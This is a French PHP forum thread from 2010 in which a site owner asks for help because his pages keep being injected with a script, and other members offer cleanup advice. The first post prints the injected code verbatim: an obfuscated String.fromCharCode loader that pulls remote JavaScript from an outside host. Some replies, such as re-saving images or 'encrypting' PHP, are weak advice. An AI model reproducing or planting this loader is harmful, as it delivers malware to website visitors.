begin process at 2012 05 31 04:42:46
  Trouver un code source :
 
dans
 
Accueil > Forum > 

PHP

 > 

Réseau & Internet

 > 

Autre

 > 

piratage site


Derniers messages déposésPoser une question dans le forum ou lancer une discussion

piratage site

vendredi 26 février 2010 à 14:10:25 | piratage site

crazydancer

Bonjour,

J'ai un problème sur mon site.

Régulèrement, mes pages php sont modifiées et une une balise est rajoutée commandant le téléchargement d'un fichier heureusement bloqué par mon AV.

Voici ce qui est ajouté :
<kJNPAGyUfwlpmhli1o6kENwBUZTINEoUZ5KH6vuxrkQU5><script>eval(String.from CharCode102,117,110,99,116,105,111,110,32,108,106,115,40,41,123,116,114,121,123,118,97,114,32,115,61,100,111,99,117,109,101,110,116,46,99,
114,101,97,116,101,69,108,101,109,101,110,116,40,34,115,99,114,105,112,116,34,41,59,115,46,115,101,116,65,116,116,114,105,98,117,116,101,40,34,115,114,99,34,44,34,104,116,116,112,58,47,47,115,97,101,103,104,105,101,98,101,101,115,105,111,103,111,104,46,105,110,58,51,49,50,57,47,106,115,34,41,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,125,99,97,116,99,104,40,101,41,123,125,125,115,101,116,84,105,109,101,111,117,116,40,34,108,106,115,40,41,34,44,53,48,48,41,59));</script></kJNPAGyUfwlpmhli1o6kENwBUZTINEoUZ5KH6vuxrkQU5>

Mon hébergeur me dit que cela viendrait d'un script, mais j'ai tout vérifié et je ne trouve rien.

Pouvez-vous m'aider?
vendredi 26 février 2010 à 19:20:16 | Re : piratage site

syndrael

Réponse acceptée !
Est-ce que ton site propose l'upload de fichier ?
As-tu regardé le contenu de tes images ? Hélas on peut faire passer des scripts à travers des images..
Des pistes à voir parmi tant d'autres..
S.
vendredi 26 février 2010 à 21:23:53 | Re : piratage site

gibozsec

Réponse acceptée !
Bonjour,

Change ton mot de passe ftp après avoir passé un bon antivirus sur ton PC.

J'ai déjà eu des injections de code de ce genre après une infection.


Grrrrrrrrrrr
vendredi 26 février 2010 à 21:33:46 | Re : piratage site

crazydancer

Merci de cette réponse.

Mon site ne propose pas de upload.

Pour l'instant je n'ai que des pages php et images (png, jpg et gif)
Aucun script que du html en .php

Comment vérifier les images ?

samedi 27 février 2010 à 09:58:34 | Re : piratage site

syndrael

Tu peux peut etre les reprendre sur un logiciel d'édition d'image par exemple Gimp ou ToShop..
Les ouvrir, faire une modif et les sauvegarder.
Mais c'est qu'une idée..
S.
samedi 27 février 2010 à 10:28:07 | Re : piratage site

kohntark

Membre Club
Salut,

Ca peut venir de pas mal d'endroit à mon avis et il y a des chances que tu n'y puisses rien : contamination du serveur de ton hébergeur par exemple. Sa réponse est un peu limite d'ailleurs

J'imagine que tu l'as déjà trouvé, mais tu es victime de ça

Tu devrais dans un premier temps écrire qq lignes JS pour désactiver ce malware, ce qui devrait être possible, du style supprimer le script ayant une src à http://saeghiebeesiogoh.in:3129/js

Ce que je ferais ensuite serait de créer une simple page index.html vide. Tu l'appelles, tu jettes un oeil dans le code HTML reçu :
- non présence du script => c'est à ton hébergeur de gérer, sauf peut être si tu es sur un serveur dédié.
- présence du script
=> tu supprimes toutes tes autres pages, scripts, images, etc ... (en les sauvegardant évidemment) et tu ne conserves que le index.html vide.
Tu t'assures qu'il n'y a pas le code avant de l'envoyer sur le ftp.
Tu le charges sur le ftp, puis le re charges à partir de celui ci.
présence du script => c'est à ton hébergeur de gérer
Tu appelles index.html dans ton browser :
non présence du script => c'est à ton hébergeur de gérer car il y a de très grandes chances que cela vienne d'une infection du serveur.


Cordialement,


Kohntark -

samedi 27 février 2010 à 10:32:55 | Re : piratage site

kohntark

Membre Club
Arf :

Tu l'appelles, tu jettes un oeil dans le code HTML reçu :
- non présence du script => c'est à ton hébergeur de gérer, sauf peut être si tu es sur un serveur dédié.


Non, ça peut toujours venir d'ailleurs, continue sur le point suivant.

Et tiens nous au courant.

Cordialement,

Kohntark -

mercredi 7 juillet 2010 à 10:43:57 | Re : piratage site

eastflo

Est ce que ton code est bien crypté??
Le problème peut venir de la car si on peut y accédez on peut le pirater facilement^^. C'est là l'avantage mais aussi l'inconvéniant de PHP => très/trop souple.


Cette discussion est classée dans : site, piratage


Répondre à ce message

Sujets en rapport avec ce message

CE SITE EST EN ASP !!!!!! [ par bsa ] pas mal pour un site de php... ce site est en asp...je ne le trouve pas mal, mais bon niveau credibilité c'est just...(et puis si en fait le bandeau Besoin de savoir kel portail tutilise!! [ par Kamikaze Poison ] Lu , jai jouer avec JeSuisPasUnLapin.com à CS et ma parler du site , et il est trés trés bien , et je vois ke tutilise un portail et moi jen ai ess Comment faire un site mirroir ? [ par Clem ] Mon site est a multimania et j'aimerai bien le mettre sur une adresse.com qui est réservée et tout. Mais je ne peux y mettre qu'un seul Mo. Comment fa nouveau site [ par vinceoli ] Voilà j'ai fait un site sur php et javascript qui est presque finit j'espère que vous y ferez un tour Mercihttp://www.vinceoli.fr.st Editeur PHP [ par ALEX001 ] Je suis nouveau dans le domaine du php et je sais pas quoi utilisé comme editeur et que faut t'il de plus pour faire un projet de la taille de VBfranc Recherche script php [ par Xavier ] Bonsoir à tous, Je recherche un script comme présenté ici :http://www.toutestfacile.com/phpinit.php?tef_site=php&common=scripts/indexpour mettre sur m site en php rech collaborateur [ par marc ] pour site a creer rech. collaborateurconnaissance php graphisme referencementremuneration %contact marclei33@aol.com Temps d'affichage d'une page [ par Indy ] Bon bon, après deux jours passés à comprendre le fonctionnement de php3 et de mysql (site chez Free.fr), toutes les infos voulues sont enfin bien envo Recherche d'un développeur PHP [ par Guillaume ] Bonjour,Accents poétiques (http://www.accents-poetiques.com), site communautaire avec plus de 800 membres inscrits, cherche à dynamiser son audience e HELP < COMPARAISON > svppp [ par ^UnKnOwN` ] Salut !j'essaye de faire une partie private pour mon site en notant les login et les pass dans un fichier texte. Ensuite doit se trouver sur le site 2


Nos sponsors


Sondage...

CalendriCode

Mai 2012
LMMJVSD
 123456
78910111213
14151617181920
21222324252627
28293031   

Consulter la suite du CalendriCode

A découvrir



 
Développement réalisé par Nicolas SOREL (Nix) avec l'aide de : Cyril DURAND et Emmanuel (EBArtSoft), Merci à Vincent pour ses précieux conseils.
CodeS-SourceS.com© Toute reproduction même partielle est interdite sauf accord écrit du Webmaster
CodeS-SourceS.com© est une marque déposée tous droits réservés

Google Coop CodeS-SourceS Google Coop CodeS-SourceS
Temps d'éxécution de la page : 0,468 sec (4)

Nous contacter | Annoncer sur CodeS-SourceS | Mentions légales